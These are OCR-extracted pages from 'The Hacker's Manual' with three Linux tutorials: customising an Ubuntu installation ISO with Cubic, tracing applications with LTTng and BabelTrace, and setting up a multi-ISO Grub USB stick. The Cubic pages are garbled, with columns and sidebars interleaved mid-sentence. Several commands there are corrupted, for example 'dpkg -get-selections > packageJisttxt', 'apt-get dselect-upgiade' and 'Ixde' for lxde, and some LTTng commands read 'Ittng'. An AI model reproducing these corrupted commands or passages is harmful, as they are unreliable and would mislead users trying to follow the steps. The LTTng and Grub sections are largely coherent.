later be rolled into an installation ISO. Check out the Plymouth themes at www.gnome- won't work
In general, most customisations that you can carry out look.org or modify/create your own (see https:Z< properly.linuxium.
from the command line on a running Linux system can be wiki.ubuntu.com/Plymouth). com.au.
done from here, and you can use familiar tools, such as apt.
to carry them out. More advanced customisation can get Krita rather than GIMP for this example, but we didn't
quite technical, but on the positive side, there is practically because the Krita package pulls in quite a lot of KDE
no limit to the changes you can make. Note that we can cut resources, and we're trying to keep this example fairly slim.
and paste commands into the window. There is also a copy What we've done so far is a fairly minor change to the
icon at the top of this window, and this allows you to copy installation ISO, and we'll eventually do things like adding
files and folders into the currently selected directory. PPA repositories and changing the desktop environment,
Before we attempt to add packages to the system, we'll but for now. we’ll leave it at that.
start by adding the Universe and Multiverse repositories
and update the system. Optimise packages
add-apt-repository universe Clicking Next again takes us to another screen (after Cubic
add-apt-repository multiverse has carried out a bit more preparatory work) and this page
Notice that we omit the sudo command as we're allows you to remove packages from the final installation.
effectively the root user already, but show some care as you This means that you can have packages that are on the live
could accidently wreak havoc on this virtual system as we ISO, but are not part of the actual installation. Make
can affect any files we like within it. If we run apt upgrade , alterations in this section with care, and don't remove
the entire system will be updated to the current version of anything unless you’re absolutely sure that the system
each package. This doesn't increase the size of the eventual doesn't need it.
ISO by much because you’re only replacing outdated As is true at all stages of customisation, you can move
packages with newer versions. backwards and forwards through the pages of the Cubic
GIMP and Inkscape are two highly useful graphics interface without losing the virtual filesystem that contains
programs, and we'll add them both by typing apt install your modifications.
gimp inkscape . When you use apt in this way, before you Clicking Next takes you to a page where you can select
confirm that you want to go through with the installation, between three tabs. 'Kernel' allows you to choose the kernel
apt will give you an estimate of how much space will be that will be installed. This is the kernel that the installer
used up; although, it is impossible to say precisely how boots to rather than the kernel that is eventually installed to
much size this will add to your finished installation ISO as your hard disk. Occasionally, the stock kernel on a standard
the filesystem will be compressed. We could have used ISO won't work because of incompatibilities with your

Cubic Documentation
The documentation for Cubic is rather limited as Cubic is quite a well-known program and it's
0 Cubic
it's concentrated on the Launchpad page for the been around for a number of years, so web Overview Code Bugs Blueprints Translations

project. The two areas that provide the most searches tend to be fruitful. For example,
Questions for Cubic
information are the Answers and FAQs sections. searching on askubuntu.com produces a lot of
by relevancy ■ Search
The Answers section shows a good (but not useful information. However, check the age of Languages fitter (Change your preferred languages)
o English (en)
massive) level of activity and it helps that it's posts as they stretch back quite a long way and Status
oOpen a Needs information o Answered o Solved Expired invalid
searchable too. The main Cubic developer might not be applicable to the version of Ubuntu
Summary Created Sob
is highly active on this forum-like section of the that you are using. A few YouTube videos covering • 698512 Cannot bot ISO FMe generated with Cubk 2021 -08-25 1 Je
Launchpad page, often offering highly detailed the basics exist. We feel that a lack of plentiful, 2021.06-52-

answers. This means that the information is there, traditional documentation is probably the weakest > Asking around on the Launchpad is
but it's quite a lotof work to search for it. point of the overall Cubic experience. probably your best bet for answers.

The Hacker's Manual | 113


Hacking
hardware, but an older or newer kernel will work. Install the What you should be presented with is a standard
kernel you want to work with on the Terminal page ( apt Ubuntu installation, but it will install the extras that we have
install <name of kernel>) and then select it here if the latest added (GIMP and Inkscape in this example). If you choose
As we were using one causes any problems. 'Test Ubuntu’ rather than ‘Install Ubuntu’, you can use the
Cubic, we noticed ‘Preseed' allows you to alter software choices during live environment, and it too will contain the extra packages
that the following installation. See the Debian Wiki (https://wiki.debian.org/ that we've added. If you select 'minimal installation’ in the
error kept popping
Debianlnstaller/Preseed) for a full guide to what Ubuntu installer options, our changes will always be added,
up: “Error while
dialing dial unix/
preseeding is capable of and how it works. 'Boot' has but the installation process will go faster and less cruft will
run/zsysd.sock: options that mostly relate to the GRUB bootloader. In this be added to the installation.
connect: no such example, we won’t alter anything in the sections on this Once the installation has completed, assuming
file or directory" page. The next page allows you to alter the compression everything has worked as it should, you should be able to
However, the
scheme used by Squashfs, and we’ll leave this as is too. boot into Ubuntu Linux and test it out.
developer himself
mentioned on the Having gone through a test installation, we've only
forum that the Generate the ISO scratched the surface of what you can do with Cubic. Here
error can The next page is the Generate page, and as soon as we go are some further refinements and ideas to personalise the
be ignored.
to this page, Cubic will start the work of building the installation. To make the additions, you can open the Cubic
installable system. In the interests of testing the system working directory that you used before. This saves time and
with a simple example, we’d recommend allowing this keeps the changes we made in terms of updating the
process to complete if you're new to using Cubic. package system.
Compressing the filesystem and building the ISO is quite a
lengthy process, and usually takes several minutes or Desktop environments
more, while giving your CPU and memory quite a workout. We can add the LXDE desktop environment and the
Linux always seems to use up a lot of memory when LightDM login manager by typing apt install Ixde lightdm
dealing with either large files, lots of files, or both; so on the terminal page. When you do this, you should see a
consider shutting down unneeded applications at this text mode dialogue that gives you the option of choosing
point, unless you have a lot of system memory to spare. your default login manager. Choose LightDM. We now have
Things were a bit cramped on the 8GB machine we used for to edit a text file to make LXDE the default desktop
testing If everything goes according to plan, the end result environment for new users. Within the Cubic chroot
will be an ISO. Load the ISO into a virtual machine to terminal type nano /usr/share/lightdm/lightdm.
complete the test. conf.d/50-ubuntu.conf . Apologies for the long filename
there; it's not so bad if you use Tab completion to get to it.
In this file, change the part after the user-session= to read
LXDE rather than whatever is already in there. This means
that you will now automatically log into LXDE. and in
addition, LXDE will be the desktop environment of the live
ISO, if you choose ’Try Ubuntu' rather than 'Install Ubuntu’.
It's possible to mass-copy installed packages from an
already installed system using an old apt trick. Type
dpkg -get-selections > packageJisttxt on a running setup
The chroot to gather a list of all packages installed on the system. You
terminal of Cubic. can then apply this list within the chroot terminal of Cubic
You’ll probably by typing:
spend most of dpkg -set-selections < packagelist.txt
your time here,
apt-get dselect-upgiade
as this is where
You can also use this technique to 'save' the package list
you can add
of a system that you ve customised in Cubic by typing that
extra packages
and make other first command into the chroot terminal of the installation.
modifications. Of course, you can prune this list by hand in a text editor,

Living in a Virtual Machine


One downside of creating a respin is that you virtualiser, there's an option in Settings... >
usually reed to carry out the installation, the Storage > Controller: SATA called Use Host I/O
longest part of the respin process, over and over Cache', and we’ve found that it greatly speeds up
again. Typically, you’ll do this with a VM and any tasks such as installing a distro. There's a slight
increase in efficiency here is well worth it, risk of data loss within the VM if it crashes when
As with all file-based Linux work, increasing the using this option, but it’s not
amount of available memory will speed things up. a big deal with a job like this as you could just start
Allocating 2GB is about the minimum for the installation again.
reasonable performance. Allocate as many CPU Even if you plan to use the full install eventually,
cores as you can as the Ubuntu installer will make select 'minimal' in the Ubuntu installer to speed > VirtualBox (and possibly other VM
the most of them. If using VirtualBox as your things up when testing. managers) can speed up host I/O.

114 | The Hacker's Manual


Build your own custom Ubuntu distro
Plymouth themes at www.gnome-look.org.
Most come with an installation script.
To use with Cubic, download the theme
and unpack it and then copy the files to the
chroot environment using the 'copy' icon. At
the Cubic terminal, cd into the directory and
run the installation script. Once this has
completed, do rm -rf [name of directory] to
remove the directory with installation files so
that it isn’t copied to the installation ISO. See
the official Ubuntu Wiki (https://wiki.ubuntu.
com/Plymouth) for more information on
customising your own Plymouth themes.
Most of those instructions don't require
any modification to work under the Cubic
chroot, but having made the changes type
> The package removal page. If ticked, these packages will
not be added to the final Linux installation. update-initramfs -k all.

Custom PPAs
Users and wallpapers You can add debs and PPAs to Ubuntu in the normal way
Whenever a distribution like Ubuntu creates a new user it that you'd expect, using the chroot environment
creates a directory for that user and populates it with the on the Terminal page. So, for example, you could add
contents of the /etc/skel directory. Let's look at a case the Inkscape PPA and install Inkscape by typing:
where you want to give the user a custom backdrop image add-apt-repository ppa:inkscape.dev/stable
as soon as they log in for the first time. apt install inkscape
The snag is that different desktop environments use This means that Inkscape will now be installed from the
different methods to display the background image. This is get go, and when you update the system, the updated
a method that will work for LXDE. In the case versions will be pulled from the PPA rather
of LXDE. the file manager (PCManFM) draws the backdrop. than the Ubuntu repository. Do something like apt-cache
To begin the process try customising the LXDE desktop in a policy and cut and paste that into a text file if you want to
running VM, and set the backdrop image to something in keep a complete list of every repository you've added to the
the /usr/share/backgrounds/ directory. Having done this, system as a reminder for future respins.
copy the configuration file from its location within the home Add downloaded debs to the chroot environment
directory (-/.config/pcmanfm/LXDE/desktop-items-O. and install them with dpkg -i [name of .deb]. Nearly
conf). The parameter within this file happens to be everything will work, but occasionally something requires a
‘wallpapei=’ and you can edit it by hand if you want to. service that the chroot environment can't provide. As is the
On the other side, copy the files to the filesystem of the case with customising the user home directory, as detailed
Cubic chroot environment using the 'copy' icon at the top of earlier, if you can't automate the installation, you could copy
the Terminal page. Place the image in the same place as the .deb files manually and add a small post-install script, to
before by typing cd /usr/share/backgrounds/ and using the be invoked manually, to install them.
copy icon at the top. Happy respins!
Recreate the config directory structure and move into
that directory with:
cd /etc/skel
mkdir -p .config/pcmanfm/LXDE
cd .config/pcmanfm/LXDE
Following this, copy the desktop-items-O.conf file into
this directory using the copy icon.
There's quite a lot of potential here to pre-customise the
user environment using the method of customising in a
VM and then copying the configuration files. For example,
let's say that you were producing a custom installation ISO
for a college. In such a case, you might place a welcome
pack of useful files (PDFs, images, etc) into the home
directory. To do this, just place those files into /etc/skel
using the Cubic interface.
All of the splash screens, such as the startup screen,
used by Ubuntu Linux use a system called Plymouth.
Customising Plymouth is a lengthy topic in itself
as there are so many files that you can modify, and together
these constitute a theme. The easiest way to get started The ISO generation screen. This is a time-consuming process and memory and
with customising the splash screens is to browse the CPU usage will peak while it’s going on.

The Hacker's Manual | 115


Hacking

LTTng: Tracing
apps in Linux
It’s time to introduce the essentials of software tracing and how to
use LTTng for understanding what’s happening on a running system.
2. mtsouk@LTTng: - (ssh)
mtsouk@LTTng:~$ sudo apt-get install Ittng-tools Ittng-modules-dkms liblttng-ust-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
liblttng-ust-dev Ittng-modules-dkms Ittng-tools
0 upgraded, 3 newly installed, 0 to remove and 215 not upgraded.
Ubuntu 16.04
Need to get 0 B/873 kB of archives.
requires Ittng-tools,
After this operation, 6,191 kB of additional disk space will be used.
Ittng-modules-dkms Selecting previously unselected package liblttng-ust-dev;amd64.
and liblttng-ust-dev (Reading database ... 175696 files and directories currently installed.)
for LTTng to run Preparing to unpack ..,/liblttng-ust-dev_2.7.1-l_amd64.deb ...
properly. Unpacking liblttng-ust-dev:amd64 (2.7.1-1) ...
Selecting previously unselected package Ittng-modules-dkms.
Preparing to unpack ..,/lttng-modules-dkms_2.7.1-l_all.deb ...
Unpacking Ittng-modules-dkms (2.7.1-1) ...
Selecting previously unselected package Ittng-tools.
Preparing to unpack .../Ittng-tools_2.7.1-2~fakesyncl_amd64.deb ...
Unpacking Ittng-tools (2.7.1-2~fakesyncl) ...
Processing triggers for man-db (2.7.5-1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Processing triggers for systemd (229-4ubuntu4) ...
Setting up liblttng-ust-dev:amd64 (2.7.1-1) ...
Setting up Ittng-modules-dkms (2.7.1-1) ...
Loading new lttng-modules-2.7.1 DKMS files...
First Installation: checking all kernels...
Building only for 4.4.0-21-generic
Building initial module for 4.4.0-21-generic
Done._____________________________________________________________________________________________

TTng is an open source tracing framework that runs on (which are hardcoded at specific locations in the source

Software tracing
is the process of
understanding
L Linux. This enables you to understand the interactions
between multiple components of a system, such as the
kernel, C or C++, Java and Python applications. On the
Ubuntu 16.04 distro you can install LTTngaz follows:
code), and automatic (which are dynamically executed when
something specific happens). Controlling tracing is what you
can do using the Ittng command line utility. The following
command displays all available tracing events related to the
$ sudo apt-get install Ittng-tools Ittng-modules-dkms liblttng- Linux kernel:
what's happening
on a running ust-dev $ sudo Ittng list -kernel
software system. After a successful install you will see at least one process $ sudo Ittng list -kernel I wc
A trace application related to LTTng running (see above right for how the 234 1389 17062
can trace both
installation process looks in more detail): (You can see a small part of the output from Ittng list
user applications
# ps ax I grep -i Itt I grep -v grep -kernel. bottom right). If the previous commands fail then
and the OS at the
same time. If you're 3929 ? Ssl 0:00 /usr/bin/lttng-sessiond there’s a chance that the LTTng kernel module isn’t running,
an amateur Linux You can find the version of LTTng you are using with: which you can check with: $ Ismod I grep -i Itt.
user, you may find $ Ittng -version In that case, you can start LTTngas follows:
tracing difficult
Ittng (LTTng Trace Control) 2.7.1 - Herbe a Detoume $ sudo /etc/init.d/lttng-sessiond start
to understand, so
try using simple [ ok ] Starting Ittng-sessiond (via systemctl): Ittng-sessiond.
examples until it Using LTTng service.
makes more sense. LTTngdoes two main things: instrumenting and controlling If you try to run the LTTng list command without root
tracing. Instrumenting is the task of inserting probes into privileges, you will get an error message instead of the
source code, and there are two types of probes: manual, expected output:

116 | The Hacker's Manual


LTTng

Comparing LTTng to similar tools


There are many tracing tools for Linux including perf_events can solve many issues and is trace files in CTF format, which allows you to
DTrace. perf_events. SystemTap. sysdig. strace relatively safe to use and as a result it is very process them remotely or put them in a
and ftrace. SystemTap is the most powerful tool good for amateur users who don't need to database such as MongoDB or MySQL. However,
of all but LTTngcomes close, apart from the fact control everything on a Linux machine. Built into as you have to post-process the generated trace
that it doesn't offer an easy way to do in-kernel the Linux kernel, ftrace has many capabilities but files you cannot get real-time output from LTTng.
programming. DTrace is in an experimental state doesn't offer in-kernel programming, which Tne key to successful tracing is to choose a
on the Linux platform, its biggest advantage is means that you'll have to post-process its output. powerful tool, learn it well and stick with it. LTTng
that it also works on other Unix platforms including Solaris and Mac OS X. Alternatively, [...] LTTng has the lowest overhead of all tools because its core is very simple and generates [...] makes a perfect candidate, but don't choose a tool until you try several of them first.
$ lttng list --kernel
Error: Unable to list kernel events: No session daemon is available
Error: Command error
Should you wish to avoid running all LTTng-related commands as root, you should add the desired users to the tracing group as follows:
$ sudo usermod -aG tracing <username>
To start an LTTng tracing session use:
$ lttng create new_session
Session new_session created.
Traces will be written in /home/mtsouk/lttng-traces/new_session-20160608-111933
$ lttng list
Available tracing sessions:
  1) new_session (/home/mtsouk/lttng-traces/new_session-20160608-111933) [inactive]
Trace path: /home/mtsouk/lttng-traces/new_session-20160608-111933

Use lttng list <session_name> for more details
$ lttng list new_session
Tracing session new_session: [inactive]
Trace path: /home/mtsouk/lttng-traces/new_session-20160608-111933
$ lttng destroy new_session
Session new_session destroyed
$ lttng list
Currently no available tracing session
The first command creates a new LTTng session named new_session and the second command lists all available sessions. The third command displays more information about a particular session, while the fourth command destroys an existing session. The last command verifies that the new_session session has been successfully destroyed. Although the destroy command looks dangerous, it's not—it just destroys the current session without touching any of the generated files that contain valuable information. Please note that LTTng saves its trace files in ~/lttng-traces. The directory name of each trace follows the session_name-date-time pattern.

Tracing behaviour
This section will trace the behaviour of a Linux system after executing LibreOffice Writer. However, before you start the actual tracing, you should tell LTTng which events you want to trace. This command tells LTTng to trace all kernel events:
$ lttng enable-event -a -k
All kernel events are enabled in channel channel0
The above command must be executed at a specific time and the list of commands you'll need to execute must follow this order:
$ lttng create demo_session
$ lttng enable-event -a -k
$ lttng start
$ /usr/lib/libreoffice/program/soffice.bin --writer &
$ lttng stop
Waiting for data availability.
Tracing stopped for session demo_session
After lttng stop has finished, the contents of ~/lttng-traces should be similar to the following:
$ ls -lR /home/mtsouk/lttng-traces/demo_session-20160615-154836
/home/mtsouk/lttng-traces/demo_session-20160615-154836:
total 4
drwxrwx--- 3 mtsouk mtsouk 4096 Jun 15 15:48 kernel

/home/mtsouk/lttng-traces/demo_session-20160615-154836/kernel:
total 143480
-rw-rw---- 1 mtsouk mtsouk 145408000 Jun 15 15:51 channel0_0
drwxrwx--- 2 mtsouk mtsouk      4096 Jun 15 15:48 index
-rw-rw---- 1 mtsouk mtsouk   1503232 Jun 15 15:48 metadata

/home/mtsouk/lttng-traces/demo_session-20160615-154836/kernel/index:
total 32
-rw-rw---- 1 mtsouk mtsouk 31096 Jun 15 15:51 channel0_0.idx

> The philosophy of tracing is similar to the way you debug code: if you have no idea what you are looking for and where, no tool can help you find your problem. As a result, some preparation is needed before using tools such as LTTng.

> This lttng command shows all tracing events related to kernel operations.
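If you hit the "No session daemon is available" error shown above, the session daemon simply isn't running yet. As a rough sketch (whether a systemd unit is shipped, and its exact name, depends on your distro), you can start it by hand and then retry the listing:
$ sudo lttng-sessiond --daemonize
$ sudo systemctl start lttng-sessiond
$ sudo lttng list --kernel
The first command starts the daemon directly; the second is the service-manager route on distros that package a unit for it. Once the daemon is up, the kernel tracepoints should be listed instead of the error.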

$ file metadata
metadata: Common Trace Format (CTF) packetized metadata (LE), v1.8
$ file channel0_0
channel0_0: Common Trace Format (CTF) trace data (LE)
$ file index/channel0_0.idx
index/channel0_0.idx: FoxPro FPT, blocks size 1, next free block index 3253853377, field type 0
As you can see, the size of channel0_0 is about 145MB, whereas the metadata file is significantly smaller. However, both files are stored in CTF format. So far, you have your trace files. The next section will use the BabelTrace utility to examine the generated trace data.

Analysing tracing data
The BabelTrace utility will be used for parsing the produced trace files. The first thing you can do on a trace file is:
$ babeltrace ~/lttng-traces/demo_session-20160615-154836
which prints the full contents of the trace file on your screen and allows you to get a good idea about the captured trace data. The next logical thing to do is filter the output in order to get closer to the information you really want.
As the output of babeltrace is plain text, you can use any text processing utility, including grep and awk, to explore your data. The following awk code prints the top 10 of all calls:
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 2>/dev/null | awk {'print $4'} | sort | uniq -c | sort -rn | head
Similarly, this awk code prints the top 10 of system calls:
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 2>/dev/null | grep syscall_ | awk {'print $4'} | sort | uniq -c | sort -rn | head
You can see the output of both commands (pictured above). The first shows that the total number of recorded entries in demo_session-20160615-154836 is 3,925,739! After this, you can count the total number of write system calls:
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 | grep syscall_entry_writev | wc
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 | grep syscall_exit_writev | wc
Each system call has an entry point and an exit point, which means that you can trace a system call when it's about to get executed and when it has finished its job. So, for the writev(2) system call, there exist syscall_entry_writev and syscall_exit_writev.
As our executable file is LibreOffice Writer, the next output will tell you more about its system calls:
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 2>/dev/null | grep -i Libre
The command (below) will show which files were opened:
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 2>/dev/null | grep syscall_entry_open
However, in this case, the syscall_exit_open trace point is more useful, because it also shows the return value of the open(2) system call:
$ babeltrace ~/lttng-traces/demo_session-20160615-154836 2>/dev/null | grep syscall_exit_open | grep "ret = -1"
[15:49:17.175257726] (+0.000000719) LTTng syscall_exit_open: {cpu_id = 0}, {ret = -1}
If you read the man page of open(2), you'll find that a return value of -1 signifies an error. This means that such errors might be the potential root of the problem. The next sections will talk about tracing your own code.

> As the output of babeltrace is in plain text format, you can use any text processing tool to investigate a trace file, such as grep, awk, sort and sed etc.

> The lttng view command can help you view the recorded trace records if you execute it after lttng stop and before lttng destroy. However, lttng view still executes babeltrace in the background.

Although the process of making LTTng trace your own C code is relatively easy to follow, it involves many steps. The first is creating your own trace events. As you will see, each trace event needs a provider name, a tracepoint name, a list of arguments and a list of fields.
The initial version of the C code you want to trace, saved as fibo.c, is the following:
#include <stdio.h>

size_t fibonacci(size_t n)
{
  if (n == 0)
    return 0;
  if (n == 1)
    return 1;
  if (n == 2)
    return 1;

  return (fibonacci(n-1) + fibonacci(n-2));
}

int main(int argc, char **argv)
{
  unsigned long i = 0;
  for (i = 0; i <= 16; i++)
    printf("%li: %lu\n", i, fibonacci(i));
  return 0;
}
In order to trace fibo.c, you will need the following LTTng code, which defines a new trace event:
#undef TRACEPOINT_PROVIDER
#define TRACEPOINT_PROVIDER fibo

#undef TRACEPOINT_INCLUDE
#define TRACEPOINT_INCLUDE "./fibo-lttng.h"

#if !defined(_HELLO_TP_H) || defined(TRACEPOINT_HEADER_MULTI_READ)
#define _HELLO_TP_H

#include <lttng/tracepoint.h>

TRACEPOINT_EVENT(
  fibo,
  tracing_fibo,
  TP_ARGS(
    size_t, input_integer
  ),
  TP_FIELDS(
    ctf_integer(size_t, input_integer_field, input_integer)
  )
)

#endif /* _HELLO_TP_H */
#include <lttng/tracepoint-event.h>
This is saved as fibo-lttng.h and defines a new trace event with a full name of fibo:tracing_fibo. The input_integer_field is the text that will be written in the trace files. According to the C standard, the size_t type, used in both fibo-lttng.h and fibo.c, is an unsigned integer type of at least 16-bit.
You are also going to need a file named fibo-lttng.c:
#define TRACEPOINT_CREATE_PROBES
#define TRACEPOINT_DEFINE

#include "fibo-lttng.h"
The main purpose of fibo-lttng.c is to have fibo-lttng.h included in it in order to compile it:
$ gcc -Wall -c -I. fibo-lttng.c
$ ls -l fibo-lttng.*
-rw-rw-r-- 1 mtsouk mtsouk    84 Jun 17 19:09 fibo-lttng.c
-rw-rw-r-- 1 mtsouk mtsouk   497 Jun 17 19:11 fibo-lttng.h
-rw-rw-r-- 1 mtsouk mtsouk 11600 Jun 17 19:12 fibo-lttng.o
So, now that you have fibo-lttng.o, you are ready to make the necessary changes to fibo.c and compile it. The final version of fibo.c will be saved as traceMe.c. This output uses the diff command to show the differences between fibo.c and traceMe.c:
$ diff fibo.c traceMe.c
1a2,3
> #include <unistd.h>
> #include "fibo-lttng.h"
4a7
> tracepoint(fibo, tracing_fibo, n);
11c14
< return (fibonacci(n-1)+fibonacci(n-2));
---
> return (fibonacci(n-1)+fibonacci(n-2));
16a20
> sleep(10);
20a25
As you can see, you must include one extra header file - the one you created earlier - as well as an extra tracepoint(). You can call tracepoint() as many times as you want anywhere in the C code. The first parameter of tracepoint() is the name of the provider, the second is the name of the trace point, and the rest is the list of parameters you're inspecting—in this case, you are inspecting just one variable.
The last thing to do before executing traceMe.c is to compile it:
$ gcc -c traceMe.c
$ gcc -o traceMe traceMe.o fibo-lttng.o -ldl -llttng-ust
You should enable the trace event defined in fibo-lttng.h after starting a tracing session:
$ lttng create fibo_session
$ lttng enable-event --userspace fibo:tracing_fibo
After starting the new session, you can finally execute traceMe, allow it to finish and stop the tracing process:
$ lttng start
$ ./traceMe
$ lttng stop
$ lttng destroy
Running the command (below) while ./traceMe is still being executed will reveal all available user space trace events, including the one you declared in fibo-lttng.h:
$ lttng list --userspace
In order to get any output from this, the traceMe executable must be running—this is the reason for calling sleep(10) in traceMe.c. (See the output below.)
The data from the trace can be found at ~/lttng-traces/fibo_session-20160617-193031. As traceMe.c uses a recursive function, its output has 5,151 lines, but usually you will get less output when tracing a single event.

Analysing C code
The output of babeltrace would be similar to the following:
$ babeltrace ~/lttng-traces/fibo_session-20160617-193031
[19:31:26.857710729] (+?.?????????) LTTng fibo:tracing_fibo: {cpu_id = 0}, {input_integer_field = 0}
[19:31:26.857753542] (+0.000042813) LTTng fibo:tracing_fibo: {cpu_id = 0}, {input_integer_field = 1}
$ babeltrace ~/lttng-traces/fibo_session-20160617-193031 | wc
5151 72114 540934
An awk script will reveal the number of times traceMe.c calculates each Fibonacci number:
$ babeltrace ~/lttng-traces/fibo_session-20160617-193031 | awk {'print $13'} | sort | uniq -c | sort -rn
(The output can be seen, left.) As you can understand, traceMe.c needs to be optimised! If you want to trace Python applications, you will need to install one extra package:
$ pip search lttng
lttnganalyses - LTTng analyses
lttngust - LTTng-UST Python agent
$ sudo pip install lttngust
Tracing Python code is beyond the scope of this tutorial but you can learn more about it at http://lttng.org/docs/#doc-python-application. ■

The BabelTrace tool
BabelTrace is a tool that helps you deal with various trace files, including the trace files generated by LTTng. It allows you to read, write and convert trace files using the Common Trace Format (CTF) and is very useful for presenting CTF files onscreen. If BabelTrace isn't already installed, you can get it with:
$ sudo apt-get install babeltrace
The babeltrace-log utility that comes with the babeltrace package enables you to convert from a text log to CTF, but you will not need it if you are only dealing with LTTng.
You can learn more about babeltrace at http://diamon.org/babeltrace. You could also try using Trace Compass (http://tracecompass.org) to view LTTng trace files, which is a graphical application. You can also learn more about the CTF format at http://diamon.org/ctf.

> Here we are processing the output of traceMe.c using babeltrace, which reveals that there is a serious performance problem in traceMe.c.
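The userspace tracing steps above follow a fixed pattern, so they lend themselves to a small wrapper script. The following is a minimal sketch based on the commands used in this tutorial; the script name, the set -e line and the final babeltrace call are our own additions rather than part of the original example:
#!/bin/sh
# trace-fibo.sh - create a session, trace ./traceMe, then summarise the results
set -e
lttng create fibo_session
lttng enable-event --userspace fibo:tracing_fibo
lttng start
./traceMe
lttng stop
lttng destroy
# 'lttng create' prints the real trace directory; adjust the path below to match it
babeltrace ~/lttng-traces/fibo_session-* | wc -l
Run it with sh trace-fibo.sh from the directory that contains the traceMe executable.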

Grub: Boot
ISOs from USB
An easy way to avoid a bag full of DVDs is by copying them all to one USB
stick, along with a convenient menu to pick which one to boot.
Almost all of the distribution (distro) ISO files on cover DVDs are what are known as hybrid files. This means that not only can they be written to a CD or DVD in the normal way, but they can also be copied to a USB stick with dd. The USB stick will then boot as if it were a DVD. This is a handy way of creating install discs for computers that don't have an optical drive, but it has one significant drawback: each ISO image requires a USB flash drive to itself. With USB sticks holding tens or even hundreds of gigabytes costing only a few pounds, and small drives becoming harder to find, this is a waste of space both on the stick and in your pocket or computer bag. Wouldn't it be good to be able to put several ISO files on the same USB stick and choose which one to boot? Not only is this more convenient than a handful of USB sticks, it's both faster and more compact than a handful of DVDs.
The good news is that this is possible with most distros, and the clue to how it's done is on our cover DVDs each month. We used to laboriously unpack distro ISOs onto the DVD so that we could boot them, and then we had to include scripts to reconstruct the ISO files for those that wanted to burn a single distro to a disc. Then we started using Grub to boot the DVD, which has features that make booting from ISO files possible. The main disadvantage of this approach, at least for the poor sap having to get the DVD working, is that different distros need to be treated differently and the options to boot from them as ISOs are rarely documented.
In the next few pages, we will show you how to do this: how to set up a USB stick in the first place and the options you need for the favourite distros. We will also show you how to deal with less co-operative distros.

Setting up the USB stick
First, we need to format the stick. We will assume that the stick is set up with a single partition, although you could use the first partition of a multi-partition layout. What you cannot get away with is a stick formatted with no partition table, as some are. If that's the case, use fdisk or GParted to partition the drive, then you can create the filesystem. The choice of filesystem is largely up to you, as long as it is something that Grub can read.
We've used FAT and ext2 (there's no point in using the journalling ext3 or ext4 on a flash drive). Use whatever fits in with your other planned uses of the drive; we generally stick with FAT as it means we can download and add ISO images from a Windows computer if necessary. Whatever you use, give the filesystem a label - we used MULTIBOOT - as it will be important later.
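As a concrete sketch of that formatting step - assuming, as in the rest of this article, that the stick is /dev/sde and its single partition is /dev/sde1 (yours will almost certainly differ, so check with lsblk first) - you could create a labelled FAT or ext2 filesystem like this:
$ lsblk
$ sudo mkfs.vfat -n MULTIBOOT /dev/sde1
or, for ext2:
$ sudo mkfs.ext2 -L MULTIBOOT /dev/sde1
The -n and -L options set the filesystem label that the Grub menus later in this article rely on.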

> Use GParted or one of the command-line tools to prepare your flash drive. Giving the filesystem a label is important for booting some distros' ISOs.


EFI booting
In this instance, we've created a flash drive that uses the old-style MBR booting. While most computers of the last few years use UEFI, they still have a compatibility mode to boot from an MBR, so this makes our stick the most portable option. But if you need to boot your stick using UEFI, change the grub-install command to use the UEFI target, like this:
$ sudo grub-install --target=x86_64-efi --boot-directory=/media/MULTIBOOT/boot /dev/sde
This is a 64-bit target, as UEFI is only fully supported on 64-bit hardware. If you want to use your USB stick with 32-bit equipment, stick (sorry) with the MBR booting method.

In these examples, the USB stick is at /dev/sde (this computer has a silly number of hard drives) and the filesystem is mounted at /media/sde1; amend the paths to suit your circumstances. First, we install Grub on the stick to make it bootable:
$ mkdir -p /media/MULTIBOOT/boot
$ sudo grub-install --target=i386-pc --boot-directory=/media/MULTIBOOT/boot /dev/sde
Note: the boot-directory option points to the folder that will contain the Grub files, but the device name you give is the whole stick, not the partition. Now we create a Grub configuration file with:
$ grub-mkconfig -o /media/MULTIBOOT/boot/grub/grub.cfg
This will create a configuration to boot the distros on your hard drive, so load grub.cfg into an editor and remove everything after the line that says:
### END /etc/grub.d/00_header ###

Adding a distro
This gives us a bare configuration file with no menu entries. If we booted from this stick now, we would be dropped into a Grub shell, so let's add a menu. We'll start with an Ubuntu ISO because they are popular (sorry, but they are) and because they make booting from an ISO file easy (after all, it's Ubuntu, it makes most things easy). Load grub.cfg back into your editor and add this to the end of the file:
submenu "Ubuntu 16.04" {
  set isofile=/Ubuntu/ubuntu-16.04-desktop-amd64.iso
  loopback loop $isofile
  menuentry "Try Ubuntu 16.04 without installing" {
    linux (loop)/casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper iso-scan/filename=$isofile quiet splash ---
    initrd (loop)/casper/initrd.lz
  }
  menuentry "Install Ubuntu 16.04" {
    linux (loop)/casper/vmlinuz.efi file=/cdrom/preseed/ubuntu.seed boot=casper iso-scan/filename=$isofile only-ubiquity quiet splash ---
    initrd (loop)/casper/initrd.lz
  }
}
Create the Ubuntu directory on the drive and copy over the ISO file. Then unmount the drive and reboot from the stick. You should see a Grub menu with one entry for Ubuntu that opens up to reveal boot and install options.

Special options
The first line creates a variable containing the path to the ISO file. We use a variable because it means we only need to make one change when we want to adapt the menu to a different release. The second line tells Grub to mount that as a loop device (a way of mounting a file as if it were a block device). Then we have the two menu entries. You may be wondering how we know what options to add to the menu entries. That comes from a combination of looking at the ISO's original boot menu and knowing what to add for an ISO boot. The latter, in the case of Ubuntu, is to add
iso-scan/filename=$isofile
where the variable isofile was set to the path to the file a couple of lines earlier. To see the original boot menu, we need to mount the ISO file, which is done like this:
$ sudo mount -o loop /path/to/iso /mnt/somewhere
Most ISOs use isolinux to boot, so you need to look at the CFG files in the isolinux or boot/isolinux directory of your »

> If you are creating a flash drive to share, you may want to look at the theme section of the Grub manual to make your boot screen look prettier.

> This is the basic menu you get with a default Grub configuration—functional but not very pretty.

» mounted ISO file. The main file is isolinux.cfg, but some distros use this to load other CFG files. In the case of Ubuntu, this is in a file called txt.cfg. You're looking for something like:
label live
  menu label ^Try Ubuntu without installing
  kernel /casper/vmlinuz.efi
  append file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash ---
